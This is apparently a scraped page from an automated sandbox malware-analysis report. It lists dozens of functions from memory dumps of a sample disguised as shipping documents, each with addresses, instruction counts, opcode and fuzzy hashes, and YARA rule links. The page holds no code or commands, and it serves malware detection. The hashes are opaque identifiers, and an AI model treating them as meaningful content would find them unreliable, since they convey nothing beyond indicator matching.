Instruction ID: e6901f81efff783a6029ca32d54e1d9b32ef07b01cbc177e6665f136b54e368f
Opcode Fuzzy Hash: 2afded69a4f56512321f094f637a02e5603478a459a541f4394e029821486cd4
Instruction Fuzzy Hash: B61123B4D04219CFDF40EFA4D54AAAEBBF5FB8A301F20956AC519B3341DB341A01CBA0

Function 0A1571E0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caebb7be616e2d83ba379748e2c1b43e2d94218f5658d784154b34e37652e1b9
Instruction ID: 4a68faf4c456b9d08b072c3186a02a720df321bfe8fe217d9e821c2114ddfb6a
Opcode Fuzzy Hash: caebb7be616e2d83ba379748e2c1b43e2d94218f5658d784154b34e37652e1b9
Instruction Fuzzy Hash: 4D116D70E00209CFDB05EFA8D945B8EBBF6FB40301F00C5A9D114AB266EB749A05CF81

Function 06A90040 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d09d455aa9f71074c27d1db6b13e9f7f601d9fc4309da8245020c2112a4382c4
Instruction ID: c7f3df8340fddc50155f9438205c92c2c2a8078451279d4f50a4bd5efe8438ed
Opcode Fuzzy Hash: d09d455aa9f71074c27d1db6b13e9f7f601d9fc4309da8245020c2112a4382c4
Instruction Fuzzy Hash: 6011C3B1D016188BEB58CF9BC9457DEFAF7AFC8300F14C06AD408B6254DB7909458FA0

Function 008BD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4529415200.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8bd000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 9075ec63765721cb66bbfc0563db54e9876b84e3fc218f485f31a8ce76b9701f
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: FB11BB75504380EFCB02CF10C5C4B15BFA2FB84314F24C6A9D8498B396C33AE80ACB62

Function 06A98BE0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f52f24b6e38b7d861426a17eb842bc8c7fc6298257517f7d2766d02ed3ed545a
Instruction ID: 0132eae957176c8e1daecb1a464e9c4218d48b428a5d4c2227b9dc0a91acebf0
Opcode Fuzzy Hash: f52f24b6e38b7d861426a17eb842bc8c7fc6298257517f7d2766d02ed3ed545a
Instruction Fuzzy Hash: 70110474D05209DFCB44DFA9D5465EEBBF9FF49300F2095AA9819A3301D7386A41CFA1

Function 0A15BD80 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bda88426d4a8be0310264d075f4e94b511b7fa1028d4f8398d66b215f76893f5
Instruction ID: 15dbf7216a36635c946de91976c218e7d2684ee947e80b6ea15cbf3929097265
Opcode Fuzzy Hash: bda88426d4a8be0310264d075f4e94b511b7fa1028d4f8398d66b215f76893f5
Instruction Fuzzy Hash: 0901473560C2845FCB169B7898940AE3FB6EFC7310B1580AAE94ACB392DB75CC47C751

Function 06A98079 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae2134623e955f754cf17939e372f4add41189b8020d201105b91b9b7c76db0b
Instruction ID: 89313ba25c8e4f69f4af725dffdc3afecf75498410e52c0b37ce6df21f2daed0
Opcode Fuzzy Hash: ae2134623e955f754cf17939e372f4add41189b8020d201105b91b9b7c76db0b
Instruction Fuzzy Hash: A111DD74D09219DFDF50EFA9D4452EEBFF5EB4A300F2094AAD419A3246D6784640CBA1

Function 06A9E150 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e86e59a2cad460789f055dec27622ad0eeda81574cba9fd21661ebd942432f1
Instruction ID: 5af99a2b662dbf037e9e04a252942a1fe7ab3310e22c737cd0a1d771ef2907b8
Opcode Fuzzy Hash: 2e86e59a2cad460789f055dec27622ad0eeda81574cba9fd21661ebd942432f1
Instruction Fuzzy Hash: 7F01D233B001056FCB42EF559C10AAF7BEAEFCA640B28806AF605D7281DA348D1187A5

Function 06A977F1 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e04155b9908aa933a5a6fda8a7ef3c589d61ca3d672fe89568065648d80e599e
Instruction ID: b78226a80c4c2162a70fadf9d64c96e6af1566fb3216a7757cc5f2cb3590b548
Opcode Fuzzy Hash: e04155b9908aa933a5a6fda8a7ef3c589d61ca3d672fe89568065648d80e599e
Instruction Fuzzy Hash: 7211B374D15218CFEF94EFA9C5846ECBBF4AF49300F249459D419A7251D734A846CF70

Function 06A90E10 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c56bd789b65f9ebc2d83629813c3cba7935cb7901da7d46a7f595db1f9a2f5c6
Instruction ID: f23bb7179eade52116608f84f8ba95b99cd79b908ffbd40f31ca6cf46f19bf43
Opcode Fuzzy Hash: c56bd789b65f9ebc2d83629813c3cba7935cb7901da7d46a7f595db1f9a2f5c6
Instruction Fuzzy Hash: 0A018F30A0D204DFDF45EB55E4409F9BBF9EF4B340F24929AD0089B116C7309A44DBA1

Function 06A98BF0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04c07cc55f1af972304a34bb8a8d3d652d15d58f64547fe1d82da49a6d3bbd5e
Instruction ID: bc8d8a78bb9dd7cec499deff129ba83105f9f086ee3b73a3046badf158e256a3
Opcode Fuzzy Hash: 04c07cc55f1af972304a34bb8a8d3d652d15d58f64547fe1d82da49a6d3bbd5e
Instruction Fuzzy Hash: 7911D3B4D05209DFDF44EFA9D5465AEBBF9EB89300F20956A8819E3341E7385A41CF90

Function 06A98088 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e642fd8aec482e0ea385ac543c4d8e78a523b3b5115337670aa2e34527476777
Instruction ID: 66920c868e00b09d87cb83ca6367a32c5eb2226b277e7829ec34462e78eaba0c
Opcode Fuzzy Hash: e642fd8aec482e0ea385ac543c4d8e78a523b3b5115337670aa2e34527476777
Instruction Fuzzy Hash: 6F01C974D09219DFDF40EFA9D4452AEBBF9EB4A300F20986A9919E3341D6784A40CF91

Function 06A967C8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaf11d885615675f8b8e949f7f29b211537f65d76e081636ae9277e982a5344f
Instruction ID: c47b47d8fd5d2d778bc395f5325ccd3d207f96915b61b2c4bc257e679e719a83
Opcode Fuzzy Hash: eaf11d885615675f8b8e949f7f29b211537f65d76e081636ae9277e982a5344f
Instruction Fuzzy Hash: 7CF06D31D0A128CBFF48AAA5A4055FDB6BDAF8F311F10B039D10AB3252DA3544448AA4

Function 06A968F8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f392794c1b5323ace3492f180fd923596d013df521a8149083d59062efbe896
Instruction ID: c87cd91d47632529e4934e1487b203b22ed925c66de02a36455d409397f0bfea
Opcode Fuzzy Hash: 0f392794c1b5323ace3492f180fd923596d013df521a8149083d59062efbe896
Instruction Fuzzy Hash: 5901ADB0E08208EFEB40EFB9D4056ADBBF5EF4A300F1090AAD419E7252DB344A45CF51

Function 06A9637A Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2f8367ea02211e8b204910d303b20bf0b1a8d70a9442bb04a41d0d8a80892f2
Instruction ID: 6803c6fd354b9a6db29f6e58adf5b1075b59230ff93462ac3a8570282c5f4e4e
Opcode Fuzzy Hash: e2f8367ea02211e8b204910d303b20bf0b1a8d70a9442bb04a41d0d8a80892f2
Instruction Fuzzy Hash: 6211FA74D04228CFEF55EF64D9557ECBBF5BF49301F20A0AA954AA7252DB340982CF10

Function 06A90455 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5d11779a8e90a0e5850637e2226992a00adb56d8898f7fe1557576d6b3bd66a
Instruction ID: cce542e4aadcb291279ce5748399165e0171349ea5bf635ef9aff432c2f5f561
Opcode Fuzzy Hash: f5d11779a8e90a0e5850637e2226992a00adb56d8898f7fe1557576d6b3bd66a
Instruction Fuzzy Hash: E411A574904128CFDF94DFA4C984BADBBF6BB49350F208189D549B7255CB309A85CF60

Function 0A15B878 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81e52408ed55796af263144ecfe107d279cafb8f06d2bf3b49c3eaa7aff62dbf
Instruction ID: b4adebdf4d90b0a4c2229248e9da82f1bfdd96ae1fec5a412143e9995b0adced
Opcode Fuzzy Hash: 81e52408ed55796af263144ecfe107d279cafb8f06d2bf3b49c3eaa7aff62dbf
Instruction Fuzzy Hash: CBF0C2B2D042089F8B64DFA998859EFBFF6EE98380B10013AD95593211E77099068B91

Function 0A156886 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3527c88921f5ea06647e35dde9d2279f2275a88ec04477057554fb087d35340d
Instruction ID: bff93f08b4edaecea8a09bcfcf29c011713a92bef02b1afb4c8ce17f57c487be
Opcode Fuzzy Hash: 3527c88921f5ea06647e35dde9d2279f2275a88ec04477057554fb087d35340d
Instruction Fuzzy Hash: AA010474E0020AEFCB40EFA8D840AAEBBF1FB48300F108465D914B7355DB35AA55CF91

Function 06A90E20 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6127b0ab04c1c4f35b7f090f9028f89c78c74c09fdddb2c8c58a0c324099194c
Instruction ID: 076880be3201383593f8d7a811f75c7bfeab103362708db07298e47d25b2e727
Opcode Fuzzy Hash: 6127b0ab04c1c4f35b7f090f9028f89c78c74c09fdddb2c8c58a0c324099194c
Instruction Fuzzy Hash: 71F0AF70A0D108DFDF44EF55D4049B8BBFDEF4B381F24D2A890089B212C7308A41DBA0

Function 06A97895 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ed89482b1fe2e44c06fca69aa04485422c4f8a3b7b6b7588254890467b47ffd
Instruction ID: 68714bac5b2ba2624b0764c9dafcef270c94f04ec339a28b4ced9019dd94201f
Opcode Fuzzy Hash: 4ed89482b1fe2e44c06fca69aa04485422c4f8a3b7b6b7588254890467b47ffd
Instruction Fuzzy Hash: F0019C74E14218CFEF90EFA9C8856ECBBF5AF49300F249429D419B7251E6349841CF70

Function 06A96908 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22ac093de60112d55523e5892db958a7b7033309bb06260935357d887f057622
Instruction ID: 3f1029c65f26c6adae402a0e68061182f936906b4ee13d3d2cacc3577a4f3f86
Opcode Fuzzy Hash: 22ac093de60112d55523e5892db958a7b7033309bb06260935357d887f057622
Instruction Fuzzy Hash: 29F049B0E04208EFEF44EFB9D4466ADBBF9EF89300F1090A9D41AA3251DB345A44DF51

Function 044D5BD8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91cd13ebf03e107b8fc1a1e29651a5c76baa50185ff8cac2301eee1a8a3986c2
Instruction ID: 76540bb529d93bbcfbce30305ee9724ba7eedfdeb68797b514984f4fc82b3f3f
Opcode Fuzzy Hash: 91cd13ebf03e107b8fc1a1e29651a5c76baa50185ff8cac2301eee1a8a3986c2
Instruction Fuzzy Hash: DC01CD74E002199FCF54EFB9C9546EEBBF5BF88210F10856AD419F7254EB3899018F90

Function 044DE1A7 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5b64cdec0b4ac634381b36033d149de2524afd2b1494b9bbbaf8b49cad6faf4
Instruction ID: 880ef3620f4b43b5244dba91c84bbeb8d6bd8a774e5869f0582d245b0d0a057d
Opcode Fuzzy Hash: a5b64cdec0b4ac634381b36033d149de2524afd2b1494b9bbbaf8b49cad6faf4
Instruction Fuzzy Hash: 3FF06870D002199FDF14EFA988597BEBFF1EB88300F24442AD409FB250EB7456028B95

Function 06A99228 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6fba7e61b48839770ac9fa919a0476b09fc676e9f696f1940026b49642cff0
Instruction ID: ff6cf044161bfa6973dacb3de1adffa3d5ba33787726007fe91b10313e889cc5
Opcode Fuzzy Hash: 5d6fba7e61b48839770ac9fa919a0476b09fc676e9f696f1940026b49642cff0
Instruction Fuzzy Hash: AAF08270905349BFCF81DBA8D8415DDBFB4EF06210F2401D6E858D7251E7325A55DBA2

Function 044D5710 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d61cdd0944d4c4843fb639c666875be0fd3ada7294efd3e4938aed9d870a6673
Instruction ID: c76bef285ee39559f45222d1242dc47cbcfeff606a5964c42beb26b6bb05242f
Opcode Fuzzy Hash: d61cdd0944d4c4843fb639c666875be0fd3ada7294efd3e4938aed9d870a6673
Instruction Fuzzy Hash: 1BF09039310214CFCB68BF29D9A456A37A6EF85711B6940AAE105CB372EF30DC06C754

Function 044DB2DC Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d3a5180fc9b4d38732e9a7844d92d61645efa086b638d354df95e947441a3ed
Instruction ID: 549027abd5d7e5143c57b3f38eedbe3739b0fa98cdcd4a8256c5a059d8bc191f
Opcode Fuzzy Hash: 0d3a5180fc9b4d38732e9a7844d92d61645efa086b638d354df95e947441a3ed
Instruction Fuzzy Hash: 3FF06270E002199FEF14EFA988547BEBEF5EB88300F64442AD509FB250EB7466018B91

Function 0A15BD30 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48aa74ed0087afdebcc9601fc86dbb654fc98b30c7d817d1a83ac2942bab2295
Instruction ID: e5ee535946375a757f45c64f36eeda94a50a3410a325585eecc9ad919d563064
Opcode Fuzzy Hash: 48aa74ed0087afdebcc9601fc86dbb654fc98b30c7d817d1a83ac2942bab2295
Instruction Fuzzy Hash: A3F03A36304105DFC7048F69D884C5ABBEAFF897257558069E9198B330DB729C51CF40

Function 044DF109 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fd60480a20a98b6ceff19b44035e2e4a60033d204d2485833700b0f2d6ce397
Instruction ID: 9f5481168374487204e8807bfb3743c5676df2e8f1a5b74324418d26f81f1ec0
Opcode Fuzzy Hash: 6fd60480a20a98b6ceff19b44035e2e4a60033d204d2485833700b0f2d6ce397
Instruction Fuzzy Hash: 6BF09A353002069FCB15EF68D890DAE3BEAEF8A35471404AAF104CF229CB71EC01CB90

Function 044D5720 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73776eaf441719230107a8edb4f4ec06430e08964dd0efd6abbe4c17160f7c72
Instruction ID: e23fba43b17b06b7b454baca8af8042451f41fbb1f99d1b67bb48bb513c41acf
Opcode Fuzzy Hash: 73776eaf441719230107a8edb4f4ec06430e08964dd0efd6abbe4c17160f7c72
Instruction Fuzzy Hash: 56F08238310204DFDB58AE3AD954A2A37EAEFC5A11B15806AE506CB361DF30DC018790

Function 06A93D40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6191c53a1b370b4d9507dd000b51b896591b1730f38526aa039560defc61d0
Instruction ID: bafbd8558f4b9cd8a19eef01325c5b3c906b0e5e7fbe5bbc44ff860d58a547af
Opcode Fuzzy Hash: fe6191c53a1b370b4d9507dd000b51b896591b1730f38526aa039560defc61d0
Instruction Fuzzy Hash: 46F0F675D0424CAFDB01DFA4D4056DDBFB4AB49311F00809BE80493741C6344A80CF42

Function 06A95970 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f7725fb08a617fb9aa041106f746d4fca6868ae9b50e0b7a065d103fa932f61
Instruction ID: ca935d21790c77a0234be53aacecd3810626a4d3fe070be84e15cda3fe3dbe55
Opcode Fuzzy Hash: 2f7725fb08a617fb9aa041106f746d4fca6868ae9b50e0b7a065d103fa932f61
Instruction Fuzzy Hash: E3F09A70D09208AFDB51EBA9D4052CDBBF0EF49314F1081AAD408D7A51C6344A41CB52

Function 044DF118 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3ec4ceab110b0cecf1ffb4f95ed36730ea9f289b23778fa9c10f59026dbf8f5
Instruction ID: 5666333cd196e3f28d5a9ea82b15024ea330b461529f88bd1902d5ff41bdbb5e
Opcode Fuzzy Hash: f3ec4ceab110b0cecf1ffb4f95ed36730ea9f289b23778fa9c10f59026dbf8f5
Instruction Fuzzy Hash: BBF0A0353002069FCB14AF38D840CAE3BEAEF85350314446AF104DF224DA72DC01CBD0

Function 06A9AF5F Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4841af71f7d406d40cf5f9071b1f48965a057c7a31a81086311128bc3c770178
Instruction ID: fa5b4a0d8203ac32321fbd9a90c8347f85745bc25f07bc436c3571a75e0dece3
Opcode Fuzzy Hash: 4841af71f7d406d40cf5f9071b1f48965a057c7a31a81086311128bc3c770178
Instruction Fuzzy Hash: B6E09232C2036A9AC7169BA0EC404DEBF34ED862607514593D85477040F720255A87A2

Function 06A992F8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05fa10b2cef60eeeabc1a1d31baa99fb0aa3823086544fd1e327fc6c554d77e
Instruction ID: 97252eccbb2c3e52ddaf402aa271fc396a06479c5deafc92aef531502a1ce63a
Opcode Fuzzy Hash: b05fa10b2cef60eeeabc1a1d31baa99fb0aa3823086544fd1e327fc6c554d77e
Instruction Fuzzy Hash: 3DF08CB0C04348EFCB45DFA8C54078DBBB5AF09340F1080AAD854A7242D7389A56DF41

Function 06A90258 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cfb2cd42f92616a19b5e630d923da2b9024e4a570542a574caa885156dfe6e4
Instruction ID: 1b0a72717a7829a91f93b90bb8cedf66ef95368347f7fac4266c9336b8ccedc1
Opcode Fuzzy Hash: 8cfb2cd42f92616a19b5e630d923da2b9024e4a570542a574caa885156dfe6e4
Instruction Fuzzy Hash: 7A01C974905228CFDB60CF64C991BA8BBF5FB09301F2040D9E649A7341CB759E80CF50

Function 06A963E7 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b9290a67839ef4f647c10fcf49648beb98e78b6e15cf384db05c88a0ad79044
Instruction ID: 4d05e652f3bc0b22f1068d2ec1fbd486bd06297dea59c72e7a052c9500e13c0d
Opcode Fuzzy Hash: 0b9290a67839ef4f647c10fcf49648beb98e78b6e15cf384db05c88a0ad79044
Instruction Fuzzy Hash: EAF08C3180E352CFFB52DB60C4955E9B7B8AF0B321F202299C14E5B192C33865C2CB61

Function 044DE0F0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

